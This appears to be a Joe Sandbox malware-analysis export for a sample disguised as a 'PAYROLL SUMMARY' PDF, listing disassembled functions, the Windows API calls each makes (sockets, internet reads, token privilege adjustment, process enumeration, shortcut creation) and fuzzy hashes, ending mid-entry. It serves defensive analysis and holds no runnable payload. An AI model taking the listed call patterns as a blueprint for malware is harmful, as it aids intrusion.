Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: e4040d4aceded65145035e6a1d7868bbd266680aa1a6a08777f6072ad86450f7
Instruction ID: 4b1717136a1fe58b8d7b55d13ff0da56a2fed27701cc78dedf407a37a393267c
Opcode Fuzzy Hash: e4040d4aceded65145035e6a1d7868bbd266680aa1a6a08777f6072ad86450f7
Instruction Fuzzy Hash: 63A14678136486BAD62BAE285C49FBF255CDB4A347F24011EFC02D21D2CA708D39D779

Function 002C6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 002C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C80CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C6AB1
WSAGetLastError.WSOCK32(00000000), ref: 002C6ADA
bind.WSOCK32(00000000,?,00000010), ref: 002C6B13
WSAGetLastError.WSOCK32(00000000), ref: 002C6B20
closesocket.WSOCK32(00000000,00000000), ref: 002C6B34

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 6136b7c235d8da57260a3054bb5adba3465df25d8191b47a2c5e76396ba167b9
Instruction ID: 53e5103d00d63732b9b0d1a859babb4c3c1d0c9916040b6e0d20f62047404833
Opcode Fuzzy Hash: 6136b7c235d8da57260a3054bb5adba3465df25d8191b47a2c5e76396ba167b9
Instruction Fuzzy Hash: 1D41E275B20210AFEB10AF24DC8AF6E77A9DB08710F04815DFD0AAB3C2CB709D148B95

Function 002D55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 002D564C
IsWindowEnabled.USER32 ref: 002D565A
GetForegroundWindow.USER32(?,?,00000001), ref: 002D5667
IsIconic.USER32 ref: 002D5675
IsZoomed.USER32 ref: 002D5683

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 8f8aa5ac4167e4edb78b298bcfa97e0d454674da1155e3a439f92a8ebde29913
Instruction ID: 89eb66d73c87f21f6c8448b886b220f69428f59177621d034adf28a4be839c72
Opcode Fuzzy Hash: 8f8aa5ac4167e4edb78b298bcfa97e0d454674da1155e3a439f92a8ebde29913
Instruction Fuzzy Hash: 9A11B2317219216FE7211F26EC48A2FBB9CEF84721B84402AE806D7341CBB0DD118EE8

Function 002BC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002BC69D
CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BC6B5

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

CoUninitialize.OLE32 ref: 002BC922

Strings

.lnk, xrefs: 002BC631, 002BC659, 002BC663

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 61a48125832ec325041940d134ed41a6f74f77bfe04ac9fdca13000d0ccc2d69
Instruction ID: 96bb24a9fd45d7a31c8ba4cb78cc32ef1a554b254eea02f0544ec98d981bdfad
Opcode Fuzzy Hash: 61a48125832ec325041940d134ed41a6f74f77bfe04ac9fdca13000d0ccc2d69
Instruction Fuzzy Hash: 98A16D71124201AFD700EF64C891EABB7ECFF85305F00496CF556972A2DB70EA59CB66

Function 002CC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00291D88,?), ref: 002CC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC324

Strings

GetSystemWow64DirectoryW, xrefs: 002CC31E
kernel32.dll, xrefs: 002CC30D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 9c8ec002cf79e20ce273acd2cfab2a414adbccf507fbd6bb2e365b45235ff6ba
Instruction ID: 5becace87a8b302bb3d9da442f353ba1a7a0b85310334625b67bbbb6cea2d93c
Opcode Fuzzy Hash: 9c8ec002cf79e20ce273acd2cfab2a414adbccf507fbd6bb2e365b45235ff6ba
Instruction Fuzzy Hash: 92E08C74621343CFCB214F29E808F86B6D4EB0C305B9084BEE89EC3250E770D8A1CB60

Function 002CF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 002CF151
Process32FirstW.KERNEL32(00000000,?), ref: 002CF15F

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

Process32NextW.KERNEL32(00000000,?), ref: 002CF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 002CF22E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 64f379efc12fa8d485c68869d32f8d34a30de9ad4eb744b57ff36c5e6d521286
Instruction ID: a32075b5cbd996382d55cae5d516c0418e94105ab1eae99034c19f892fcbf302
Opcode Fuzzy Hash: 64f379efc12fa8d485c68869d32f8d34a30de9ad4eb744b57ff36c5e6d521286
Instruction Fuzzy Hash: 26517C71514311AFD310EF24DC86E6BBBE8EF88710F14492DF89697291EB70E918CB96

Function 002AEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002AEB19

Strings

(, xrefs: 002AEB5F
|, xrefs: 002AEB49

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 4e8c67c728073f85a3e7d77f535683edf23e0fbcac97931d7d6fb24c28b37c2c
Instruction ID: 4168d206ec4faa136d3f8c3d266ba1b6101aec62451475f17064fcbe56025554
Opcode Fuzzy Hash: 4e8c67c728073f85a3e7d77f535683edf23e0fbcac97931d7d6fb24c28b37c2c
Instruction Fuzzy Hash: C5323675A107059FDB28CF19C481A6AB7F1FF48320B12C46EE49ACB7A1DB70E952CB50

Function 002C25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 002C26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002C270C

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: c19c7e96ebd3277871595302b140303b598b8f8f055ba6ae4e53dbf3e6990f60
Instruction ID: 41fbd8ff3cd03874d7c350b6acc231cf3f2f943a2f8efa2063271aabada2c4b4
Opcode Fuzzy Hash: c19c7e96ebd3277871595302b140303b598b8f8f055ba6ae4e53dbf3e6990f60
Instruction Fuzzy Hash: ED41D57192020AFFEB20DE54DCC5FBBB7BCEB40714F20416EF605A6140DEB19D699A64

Function 002BB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002BB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002BB655

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 19c1a7b51d0b76391012efcad083697498aa45e1e8630bddd173e51c9b63b975
Instruction ID: 0138c29dbb932f5958cdfe0e5f927efd4b52b7f6410438352d301df8c36a1b34
Opcode Fuzzy Hash: 19c1a7b51d0b76391012efcad083697498aa45e1e8630bddd173e51c9b63b975
Instruction Fuzzy Hash: C1216035A10218EFCB00EF65D884AEDBBB8FF48311F1480AAE806AB351DB319D55CF55

Function 002A8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00270FF6: std::exception::exception.LIBCMT ref: 0027102C
Part of subcall function 00270FF6: __CxxThrowException@8.LIBCMT ref: 00271041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A8D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8D3A
GetLastError.KERNEL32 ref: 002A8D47

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 8bd970eeda976b48462c8cd4b284a9753f18ddae41d1fdb8dacfed6dab6af4b8
Instruction ID: f03e1760b5b32a40e9239ed7bf2629a7bbfafa8331e8424a05182f6a3f625ed0
Opcode Fuzzy Hash: 8bd970eeda976b48462c8cd4b284a9753f18ddae41d1fdb8dacfed6dab6af4b8
Instruction Fuzzy Hash: AD11BFB1824209AFD7289F64EC89D6BB7FCEB05710B20852EF44683241EF30BC508A20

Function 002B4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002B404B
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 002B4088
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002B4091

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: aee1c5781db0ceda884f179739652d481d21862397ea58f46c3463f50002e3ac
Instruction ID: c113cfeb434d9c34d2dfb3a8403773e47d20a0d737859e7ee11386dab7f98b7b
Opcode Fuzzy Hash: aee1c5781db0ceda884f179739652d481d21862397ea58f46c3463f50002e3ac
Instruction Fuzzy Hash: E71182B1D15229BEE710ABECDC48FEFBBBCEB08750F004656BA15E7191C2B45E1487A1

Function 002B4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002B4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002B4C43
FreeSid.ADVAPI32(?), ref: 002B4C53

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
Instruction ID: 77a37d7d2fc4501f5ed0c1d594b92e286ec7bf5b51b225a1099fa047be120c0a
Opcode Fuzzy Hash: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
Instruction Fuzzy Hash: 28F04F75D1130DBFDF04DFF0DD89AADBBBCEF08201F404469A502E3282D6705A048B54

Function 002B8B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 002B8B25

Part of subcall function 0027543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002B91F8,00000000,?,?,?,?,002B93A9,00000000,?), ref: 00275443
Part of subcall function 0027543A: __aulldiv.LIBCMT ref: 00275463

Strings

0u1, xrefs: 002B8B1C

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0u1
API String ID: 2893107130-3636244747
Opcode ID: 09ee00bd989a8d60c430b362df88f56ad75fb9bc06798cf9fc729d7796f3a279
Instruction ID: 8a0f46a8e2a30b542c9056c47bd2b5caf9f7df6c9580f96fda1ef69bd1d8e922
Opcode Fuzzy Hash: 09ee00bd989a8d60c430b362df88f56ad75fb9bc06798cf9fc729d7796f3a279
Instruction Fuzzy Hash: 5521B472635511CBC72ACF35D441A92B3E5EBA9311F28CE6CD0E9CB2D0CA74B945CB94

Function 0025E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d31bd873cdde76790e0eda862f5f3c1af18b29d4b277129e24d5a68480c84c0
Instruction ID: 1c3597b3583141b6372fee88b4c3b668d6974e60f1fe6353c4a7b4e84bcfcd8f
Opcode Fuzzy Hash: 5d31bd873cdde76790e0eda862f5f3c1af18b29d4b277129e24d5a68480c84c0
Instruction Fuzzy Hash: 47228D70920216DFDF28DF54C480ABEB7B0FF04301F158469EC5A9B341E774AAA9CB95

Function 002BC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 002BC966
FindClose.KERNEL32(00000000), ref: 002BC996

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d9bbb25b84bc8dcb73082a5a08137e8227aa7e966d8705a089a0c233ab7a46e5
Instruction ID: 261c9bfbba173d6f940a82b2cc2852b761a62b333094162b8f97ab124f588e8a
Opcode Fuzzy Hash: d9bbb25b84bc8dcb73082a5a08137e8227aa7e966d8705a089a0c233ab7a46e5
Instruction Fuzzy Hash: 5D11A5316106009FDB10DF29D84992AF7E5FF44321F14851EF8A6D7291DB70AC14CF95

Function 002BA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,002C977D,?,002DFB84,?), ref: 002BA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,002C977D,?,002DFB84,?), ref: 002BA314

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 46be7dad00ee3819d1aacb41571b263d4be91e404ce0cc853c0042fb3667ca58
Instruction ID: 6ca1355efcfb76d1fbd31e9176594fe539c7e4c20fb89d15c338cfd02d7ba0dd
Opcode Fuzzy Hash: 46be7dad00ee3819d1aacb41571b263d4be91e404ce0cc853c0042fb3667ca58
Instruction Fuzzy Hash: 3DF0E23596522DABDB20AFA4DC49FEA736DBF08361F0041A6B809D2180D6309910CBA1

Function 002A8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8851), ref: 002A8728
CloseHandle.KERNEL32(?,?,002A8851), ref: 002A873A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: feffaf198117f492f5d386c770adad6e49891d7b29f16eb2047c296efe443799
Instruction ID: d4f243b0d556138bd2d7a80c5964de89074c8a1cebdfc81eada4f251c62bc245
Opcode Fuzzy Hash: feffaf198117f492f5d386c770adad6e49891d7b29f16eb2047c296efe443799
Instruction Fuzzy Hash: 42E04636020610EFE7612B24FD08D73BBE9EF00350724C82AF89A80430CB32ACA0DB10

Function 0027A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00278F97,?,?,?,00000001), ref: 0027A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0027A3A3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
Instruction ID: 9ff05b1e8d1e85512cb73e41824b74a20cfe9277360aed6246e3edda3dc73465
Opcode Fuzzy Hash: 632a21d1779542346ac6fef68a0c88734ba6e5b3ac3630f622a34311d953dc12
Instruction Fuzzy Hash: 99B09231455248ABCAC02B95FD0DB883F68EB44AA2F4180A2FE0E84060CB6258508A99

Function 0027F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
